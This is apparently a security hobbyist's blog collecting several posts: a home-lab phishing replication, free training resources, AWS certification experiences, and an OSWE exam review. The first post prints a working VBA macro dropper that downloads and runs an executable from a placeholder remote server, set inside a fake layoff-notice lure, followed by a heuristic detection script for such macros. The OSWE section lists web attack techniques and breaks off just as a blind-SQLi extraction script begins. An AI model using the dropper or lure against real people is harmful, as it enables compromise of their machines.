S7acktrac3

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Hanging off my switch is basically everything besides wireless: my ESXi lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLs and VLANs 🤣 Took me about a week to update (and save) the switch configuration, clean up my NAS, clean up all my machines & VMs, and destroy my ESXi lab and rebuild it. Just like before, my ESXi lab simulates a corporate network: an Active Directory environment with an assortment of machines running various services. I use pfSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN while your LAN is protected by a security device, just like a real network. You can google security courses and CTFs to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful; we all have to spend the time to stand things up before we can even begin to think about playing around.


Keeping Busy:

I begin to think about what I want to learn more about. I find an advanced penetration testing book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was that it was only 230 pages. I thought, damn, either this thing is complete garbage and captures .01% of something irrelevant that some other guy loved, or it’s chock full of gems. It was the latter! My head’s spinning as we write our own VBA dropper, which writes a VBS file to disk, which downloads the payload and executes a reverse shell. By the end of chapter one we’re on to writing your own C2 infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! The payloads and infrastructure progressively improve as the book progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you (the attacker) have gained access to an organization’s webmail login.
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator, who is probably already a little concerned over his job security, since through reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
  3. You craft a fake Word document that seems to be a notice of this month’s layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document, it’s a blurred image, and enabling macros is going to begin and carry out the compromise. It looks like this



    Payload:

    Sub AutoOpen()
    Dim PayloadFile As Integer
    Dim FilePath As String
    FilePath = "C:\tmp\payload.vbs"
    PayloadFile = FreeFile

    ' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server, downloads payload and executes it.
    Open FilePath For Output As PayloadFile

    Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""
    Print #PayloadFile, ""
    Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"
    Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"
    Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"
    Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"
    Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"
    Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"
    Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"
    Print #PayloadFile, " strFile = myPath"
    Print #PayloadFile, " End If"
    Print #PayloadFile, ""
    Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"
    Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
    Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
    Print #PayloadFile, " objHTTP.Send"
    Print #PayloadFile, ""
    Print #PayloadFile, " res = objHTTP.ResponseBody"
    Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"
    Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"
    Print #PayloadFile, " objFile.Write currentChar"
    Print #PayloadFile, " Next"
    Print #PayloadFile, " objFile.Close( )"
    Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
    Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE"""
    Print #PayloadFile, " End Sub"
    Close PayloadFile

    Shell "wscript c:\tmp\payload.vbs"
    End Sub


  4. The administrator viciously opens the email, the macro detonates, the payload executes and you get your reverse shell.
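A defender-side check for the dropper pattern above, as an added example (not from the post or the book it replicates): it scores VBA source for the traits this macro combines, and also reassembles the second stage written with Print # so indicators hidden inside string literals get scanned too. Both macro samples are constructed; the rule weights and threshold are assumptions for illustration.

```python
import re

# Constructed sample (not the post's full macro): the shape of the AutoOpen
# dropper above, which writes a .vbs to disk, has it fetch an EXE over WinHttp,
# and launches it through wscript.
SAMPLE_MACRO = '''Sub AutoOpen()
Dim PayloadFile As Integer
Dim FilePath As String
FilePath = "C:\\tmp\\payload.vbs"
PayloadFile = FreeFile
Open FilePath For Output As PayloadFile
Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"
Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"
Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"
Close PayloadFile
Shell "wscript c:\\tmp\\payload.vbs"
End Sub
'''

# Constructed benign macro: auto-runs and writes a log file, but never fetches
# or launches anything, so it should stay below the threshold.
BENIGN_MACRO = '''Sub Document_Open()
Dim logLine As String
logLine = "opened " & Now
Open "C:\\logs\\report.log" For Output As #1
Print #1, logLine
Close #1
End Sub
'''

# Heuristic rules: (name, weight, pattern). Weights and the threshold below are
# assumed values for illustration, not calibrated ones.
RULES = [
    ("auto-exec entry point", 2,
     re.compile(r"\bSub\s+(AutoOpen|Document_Open|Workbook_Open)\b", re.I)),
    ("opens a file for writing", 2,
     re.compile(r"\bOpen\b.+\bFor\s+Output\b", re.I)),
    ("references a script file", 1,
     re.compile(r'"[^"]*\.(vbs|js|ps1|hta)"', re.I)),
    ("HTTP client object", 3,
     re.compile(r"WinHttp\.WinHttpRequest|MSXML2\.(Server)?XMLHTTP|Microsoft\.XMLHTTP", re.I)),
    ("WScript.Shell object", 2,
     re.compile(r"WScript\.Shell", re.I)),
    ("launches a script host", 3,
     re.compile(r'\bShell\s+"?(wscript|cscript|cmd|powershell)', re.I)),
]

PRINT_RE = re.compile(r'^\s*Print\s+#\w+\s*,\s*"(.*)"\s*$', re.I)


def extract_dropped_script(macro_src):
    """Reassemble the second stage the macro writes with Print # statements.

    VBA escapes a double quote inside a string literal as "", so undo that to
    recover the text that would actually land on disk."""
    stage2 = []
    for line in macro_src.splitlines():
        m = PRINT_RE.match(line)
        if m:
            stage2.append(m.group(1).replace('""', '"'))
    return "\n".join(stage2)


def score_macro(macro_src):
    """Return (score, names of rules that fired), scanning the macro and the
    script it drops as one unit so nothing hides inside string literals."""
    combined = macro_src + "\n" + extract_dropped_script(macro_src)
    hits = [(name, weight) for name, weight, rx in RULES if rx.search(combined)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def is_suspicious(macro_src, threshold=6):
    """True when enough dropper traits co-occur to warrant a human look."""
    return score_macro(macro_src)[0] >= threshold


if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        score, names = score_macro(src)
        print(f"{label}: score={score} suspicious={is_suspicious(src)} hits={names}")
```

Feed it macro source pulled from a document with a VBA extraction tool; the benign sample scores on the auto-exec and file-write rules alone and stays under the threshold, which is the point of weighting co-occurring traits rather than any single one.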

Now that we have a way to execute payloads, on to converting the payload into a C2 host and setting up the infrastructure! Here’s a video of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you


AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head): typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected, with AWS leading (~34%), Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth (62%) is double that of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and the proposed paths to achieve them. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not to do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practitioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to trolling all related Reddit threads that I can find. This is how I narrow down what the best materials to prepare are and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometimes I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs. I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end the exam. AWS, in a horrible play, forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy; it would take a whole heap of studying to clear it. I followed a similar approach, going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was the most challenging cert of folks’ lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them? One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one you go for, it’s pretty much going deeper into the usage and capabilities of the appropriate related services. I chose to sit for C01; although C02 was recently released, I wasn’t going to risk being a live beta tester. I was concerned with the newer exam’s stability. As I write this, C01 is officially dead in 3 days, July 1 2020; then all candidates will only have C02, good luck 🤣.

Date: Monday 05/14/2020 – 0800 hrs

5 days after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure, but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retaken it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days after my 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention: when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency; I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!



Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through the Linux Academy course. After that, I bought Jon Bonso’s course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN The length of these questions is in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this, I’m not sure I really even want this thing that bad.


I took like 2 weeks off and came back to it! I wondered if I had forgotten all the things I had learned from the course; I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case I failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs, I don’t know why, but I went back to the exam scheduling and saw they had an exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.


Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimum, sometimes like four, a tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending the exam this time! There were maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like playing Russian roulette. I changed about 9 answers total, each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2 or 3 out of 6 or 7 selections. The questions are random from a bank like most of the exams so I’m not sure if the same will apply to you, but I did notice at least 2 instances where later questions cleared up previous ones. Example

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, which of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare and contrast them; you may get a bone thrown your way.

The majority of the exam was exactly that: reading and understanding policies – IAM, KMS, bucket policies. You better be able to read and understand them as if they were plain English. There was a ton of KMS related things; make SURE you know the nitty gritty like imported key material, all the different types of KMS encryption, when, where, rotation, etc.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I bought myself AWAE as a birthday gift; I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).


OSWE Review (AWAE Course)

1 November 2020 at 19:09

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple times begin to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep up. Many people assume since I have a number of certificates that maybe the process is somewhat trivial or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available. That’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give the best because best is subjective, relative and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study. The context – the thoughts, feelings, emotions and situational metadata most authors never include. So let’s begin with that.

Mindset 💡

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge. Therefore there’s never any pressure on me, besides the kind that’s self injected. It’s all for the love of learning security and its related disciplines. So if you’re the type who brute forces exams and doesn’t really care about the knowledge gain you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position but you should be driven solely by passion. That behavior waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each their own.

Why Go After OSWE

What makes a man go after any certificate 🤣 it seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, and the Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty AWS certificates towards the beginning of the summer. I didn’t plan on any of this; I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself 😂 how pitiful I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there’s not many white-box based courses vs. 1-million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root👌 If you’re a security professional and you run from source-code I can’t take you seriously. If you can only leverage tools written by others and not develop your own you’re going to severely limit yourself. That’s one thing, maybe more important for web application security professionals – the vulnerabilities occur in the source-code, they just manifest themselves in the applications, and the exploits that take advantage of the vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at-home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting. The slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th which I accepted and anxiously awaited. I decided to do 90-days of lab time since I already did the other certificates I planned to slow roll this one and if possible, pass the exam by end of year.

The Lab

If you are not familiar with Offensive Security courses: at the exact time your lab is set to begin you’ll receive an email with your VPN credentials, course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare, whether it’s video first or PDF first. Personally I watch the videos for the entire module once and then replicate using the PDF as reference, if needed, since the videos tend to be more verbose.

Along with the materials, once connected to the VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a wiki. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages and, with the videos, included 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages and included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and 3 machines with no solution purely provided for exam preparation. Of the 3 new lab machines, 2 were white-box and 1 was black-box. That’s slightly incredible, to receive seemingly 50% more content essentially on the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi – union-based, time-based, boolean-based, MySQL flavor, PostgreSQL flavor. Authentication bypasses using session hijacking & session riding will become natural, as will XXEs, SSTIs, deserialization, file upload bypasses and others. You’ll find a variety of languages including Java, PHP, Node.js, Python, C# and web frameworks to analyze and get comfortable with. For the compiled languages you’ll learn techniques to recover the original source-code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset with which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective; you won’t be throwing a vulnerability scanner at any of these boxes to find anything, and sqlmap will not work (not allowed in the exam anyway)! Run nikto, gobuster (or any other kali tool) if you want but it’s useless. You need a healthy combination of brainwork, understanding sources to sinks, routes and controllers. Become comfortable understanding code flow, and lots of it. Even following the lab guide and videos there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1), putting in like 3-4 hours on weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for the same or similar certificates. Because you’re not always going to be motivated, and having others locked-in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friends across the globe that love the same thing as you. Once you have enough friends it’ll be impossible to slack because you’ll have friends in all time zones during breakfast, lunch, dinner and while you sleep to exchange knowledge with. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to say whatever. My original exam date was October 30th and I felt like this exam was consuming me way too much and I was in the lab for way too long. I developed my methodology discussed below and rescheduled the exam for a week earlier, 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials). I honestly watched the videos 3 times and still didn’t really grasp how I would have been able to achieve such madness start to finish, and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what were the high level steps to achieve authentication bypasses, what did I exploit to get RCEs, what was the syntax of the commands I used, what did I screw up on or miss that I should be on the lookout for if I come across a similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both white-box machines in maybe a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and you say to yourself, “I knew that or I would have been able to figure that out”. With no solutions you are on your own and at the mercy of your own brain. Again, like the black-box from the lab, the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on an exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from a black-box perspective, since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source-code responsible for processing that input, then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zen a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend the majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally there are things that I don’t control fully but have some control of (certification exams). For these I shift my goal from passing to giving my absolute max, trying my best, and if I come up short I still achieve my goal. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations. It’s when your back is against the wall that determines your resiliency not when things are rosy. I’m a little nervous for the unknown, the shock factor. My only hope was that when I gained access to the exam that it didn’t feel like I had been studying for a different certification.

Day 1 – 04:30 a.m. I get out of bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant. Ensured my notes were organized once more and wrote myself some positive notes in size 50 font, bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day 1 – 09:45 a.m. I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here, but after connecting to the exam VPN I was provided 2 web applications and their source-code. The Control Panel provided details and instructions on how to access each, the point breakdown and what constituted successful compromise. The proctor has no audio; you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day 1 – 10:00 a.m. I’m off to the races. I went to the homepage of the first application to see what type of application it was, then directly to the source code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn, I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8 hours 53 minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours and rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. Other than that, I took one 30-minute break to eat on the way to the first authentication bypass.

Day 1 – 10:00 p.m. Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying, but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things because I’m tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day 2 – 12:00 a.m. I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hours 15 minutes)
Box-2 Start

Day 2 – 04:00 a.m. What is up with me and 4 a.m.? Anyway, that 4 hours felt marvelous and I woke up feeling like a tiger! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back, sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day 2 – 2:23 p.m. I noticed the authentication bypass for this one in less than half an hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was that I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day 2 – 05:00 p.m. RCE done! I have all the points now, but I also have a very important week coming up at work, and although I could wait until tomorrow (Monday) after work to write the report, my exam time expires at 10 a.m. Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day 2 – 7:00 p.m. I had been taking screenshots throughout, but I noticed how much I hadn’t grabbed when I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME, you do not want to get lazy on the report after you’ve done the exam, because they will fail you without hesitation! There are plenty of horror stories. Being a former penetration tester who has gone through a couple of Offensive Security certifications before, I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology for achieving compromise along with your attack code. I provided everything: what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in your brain during a 48-hour exam.

Day 3 – 12:00 a.m. I proofread the report with glossy eyes 4 times and completed the process of uploading the exam report. After I got the confirmation email I went to bed.

I had to wait an entire 5 days, from Sunday night to Friday, to receive my results: I had achieved the OSWE certification 👏🏽

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer back to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly: in interpreted languages, adding print statements; in compiled languages, actually stepping over/into methods and examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

  • Examine unauthenticated areas of the source code first
  • Leverage the Visual Studio Code Remote - SSH extension
    • Understand the launch.json debug configuration files in Visual Studio Code
  • Examine the routes to see all the endpoints. Understand the authorization applied to each
  • Review the controllers to understand how user input is handled by the application
  • If possible, always enable database query logging (for example MySQL’s general_log or PostgreSQL’s log_statement = 'all') so you can see exactly what your input turns into
  • dnSpy to decompile .NET, JD-GUI for Java
  • After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
  • Investigate how sanitization of user input is performed. Is it done using a trusted, open-source library, or is a custom solution in place?
  • When auditing, realize which code you can reach regardless of conditionals and loops

Potential Authentication Bypass Techniques

  • SQLi
    • Can we create a user account?
    • Can we leak hashed passwords, reset tokens and other information to aid in authentication bypass?
    • Regular (in-band), time-based blind and boolean-based blind; keep examples and templates for each
  • Broken Authentication
    • Does authentication depend on private information that we can leak from the DB using the above?
  • PHP Type Juggling
  • Reading Arbitrary Files w/ XXE
  • XSS -> CSRF (Session Hijacking or Session Riding)
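
As an added example (not code from the course or from the original post), here is the boolean-based blind SQLi extraction the SQLi bullets describe, scripted the way the exam expects: one Python program that leaks a password hash character by character with a binary search per character. It runs against a constructed in-memory SQLite stand-in whose login query is built by string concatenation, which is the bug you would spot in the exam’s source; against a live target the only change is replacing the in-process oracle with one that sends the same condition through a requests Session and checks the response. The hardened, parameterized version of the same query sits beside it. For the time-based variant, the oracle instead wraps the condition in SLEEP()/pg_sleep() and measures elapsed time; the search logic is unchanged.

```python
import hashlib
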